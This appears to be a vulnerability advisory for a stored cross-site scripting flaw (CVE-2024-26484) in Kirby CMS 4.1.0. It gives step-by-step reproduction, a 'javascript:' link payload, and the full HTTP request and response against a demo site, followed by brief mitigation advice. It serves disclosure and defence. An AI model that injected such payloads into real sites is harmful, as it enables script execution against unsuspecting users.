[CVE-2024-26484] Kirby CMS 4.1.0 - Stored Cross Site Scripting

Stored Cross-Site Scripting

The tester discovered that it's possible to insert an image on the page, and the link parameter is within the href attribute. Consequently, an XSS payload can be injected. Upon someone clicking on the image, the JavaScript is executed.

Step by Step

Edit Content Layout and add Image.
Choose the image and insert the XSS payload into the link field “javascript:alert(document.domain)”.
Upon clicking on the image, the JavaScript is executed.

Untitled

Request :

POST /BGZUwFZY/api/pages/microsite HTTP/1.1
Host: trykirby.com
Cookie: kirby_session=910521efece58be7ce81f24f7c2b5978f21a791a%2B1707762274.dd8b11107e02a3859af3.2da7b8302b8e19193900caedabf370a68d674e23f80cf58135327d573242604b; instance=410dd31498585dbf2529a45d1da40600f8a7c87c%2Bhttps%3A%2F%2Ftrykirby.com%2FBGZUwFZY%2F; snipcart-cart=37440eed-2a09-4ed3-b534-515b00f4301c
Content-Length: 1328
Sec-Ch-Ua: "Not A(Brand";v="99", "Microsoft Edge";v="121", "Chromium";v="121"
X-Language: null
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Edg/121.0.0.0
Content-Type: application/json
X-Csrf: dffaa6b125814485f872c3bfb34fa828d0bdbb5597fa0cbfcd8306bf6f302683
X-Http-Method-Override: PATCH
Sec-Ch-Ua-Platform: "Windows"
Accept: */*
Origin: <https://trykirby.com>
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: same-origin
Sec-Fetch-Dest: empty
Referer: <https://trykirby.com/BGZUwFZY/panel/pages/microsite?tab=content>
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close

{"modules":[{"attrs":[],"columns":[{"blocks":[{"content":{"location":"kirby","image":[{"id":"micro-1.jpg","image":{"back":"black","color":"orange-500","cover":false,"icon":"image","url":"<https://trykirby-1653.kxcdn.com/_media/65b91907b669f/media/pages/microsite/416aa80338-1706600576/micro-1.jpg","src":"data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw","srcset":"https://trykirby-1653.kxcdn.com/_media/65b91907b669f/media/pages/microsite/416aa80338-1706600576/micro-1.jpg?width=38> 38w, <https://trykirby-1653.kxcdn.com/_media/65b91907b669f/media/pages/microsite/416aa80338-1706600576/micro-1.jpg?width=76> 76w"},"info":"","link":"/pages/microsite/files/micro-1.jpg","sortable":true,"text":"micro-1.jpg","uuid":"file://y3c8TuQhVK2cPQdi","dragText":"(image: micro-1.jpg)","filename":"micro-1.jpg","type":"image","url":"<https://trykirby-1653.kxcdn.com/_media/65b91907b669f/media/pages/microsite/416aa80338-1706600576/micro-1.jpg"}],"src":"","alt":"","caption":"","link":"**javascript:alert(document.domain)**","ratio":"","crop":false},"id":"cec0b4ee-8cc5-4799-87de-a4237f43e3b7","isHidden":false,"type":"image"}],"id":"057e4782-617e-455f-8bac-04bd9a8a1ab3","width":"1/1"}],"id":"6255aaaa-b726-4375-b675-3654986302c7"}],"description":"Representative> one-pagers for your product","uuid":"VZlscZfc8c5gEiwM"}

Response :

HTTP/1.1 200 OK
Date: Mon, 12 Feb 2024 16:32:03 GMT
Server: Apache
Cache-Control: no-store, private
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Content-Length: 1895
Connection: close
Content-Type: application/json; charset=UTF-8

{"code":200,"data":{"content":{"modules":[{"attrs":[],"columns":[{"blocks":[{"content":{"location":"kirby","image":[{"id":"micro-1.jpg","image":{"back":"black","color":"orange-500","cover":false,"icon":"image","url":"https:\\/\\/trykirby-1653.kxcdn.com\\/_media\\/65b91907b669f\\/media\\/pages\\/microsite\\/416aa80338-1706600576\\/micro-1.jpg","src":"data:image\\/gif;base64,R0lGODlhAQABAIAAAP\\/\\/\\/wAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw","srcset":"https:\\/\\/trykirby-1653.kxcdn.com\\/_media\\/65b91907b669f\\/media\\/pages\\/microsite\\/416aa80338-1706600576\\/micro-1.jpg?width=38 38w, https:\\/\\/trykirby-1653.kxcdn.com\\/_media\\/65b91907b669f\\/media\\/pages\\/microsite\\/416aa80338-1706600576\\/micro-1.jpg?width=76 76w"},"info":"","link":"\\/pages\\/microsite\\/files\\/micro-1.jpg","sortable":true,"text":"micro-1.jpg","uuid":"file:\\/\\/y3c8TuQhVK2cPQdi","dragText":"(image: micro-1.jpg)","filename":"micro-1.jpg","type":"image","url":"https:\\/\\/trykirby-1653.kxcdn.com\\/_media\\/65b91907b669f\\/media\\/pages\\/microsite\\/416aa80338-1706600576\\/micro-1.jpg"}],"src":"","alt":"","caption":"","link":"javascript:alert(document.domain)","ratio":"","crop":false},"id":"cec0b4ee-8cc5-4799-87de-a4237f43e3b7","isHidden":false,"type":"image"}],"id":"057e4782-617e-455f-8bac-04bd9a8a1ab3","width":"1\\/1"}],"id":"6255aaaa-b726-4375-b675-3654986302c7"}],"title":"Microsite","description":"Representative one-pagers for your product","uuid":"VZlscZfc8c5gEiwM"},"id":"microsite","num":6,"options":{"access":true,"changeSlug":false,"changeStatus":false,"changeTemplate":false,"changeTitle":false,"create":true,"delete":false,"duplicate":false,"list":true,"move":true,"preview":true,"read":true,"sort":true,"update":true},"parent":null,"slug":"microsite","status":"listed","template":"microsite","title":"Microsite","url":"https:\\/\\/trykirby.com\\/BGZUwFZY\\/microsite","uuid":"page:\\/\\/VZlscZfc8c5gEiwM"},"status":"ok","type":"model"}

Untitled

Solution

Cross-site scripting (XSS) is a vulnerability that allows attackers to inject malicious scripts into web pages viewed by other users. To prevent XSS attacks, you can implement various security measures:

Input Validation and Output Encoding: Ensure that all user-supplied input is validated on the server side and properly encoded before being output to the browser. This prevents attackers from injecting malicious scripts into your web application.
Escape Untrusted Data: Escape special characters (such as <, >, ', ") in user input before displaying it on a web page. This prevents the browser from interpreting the input as HTML or JavaScript code.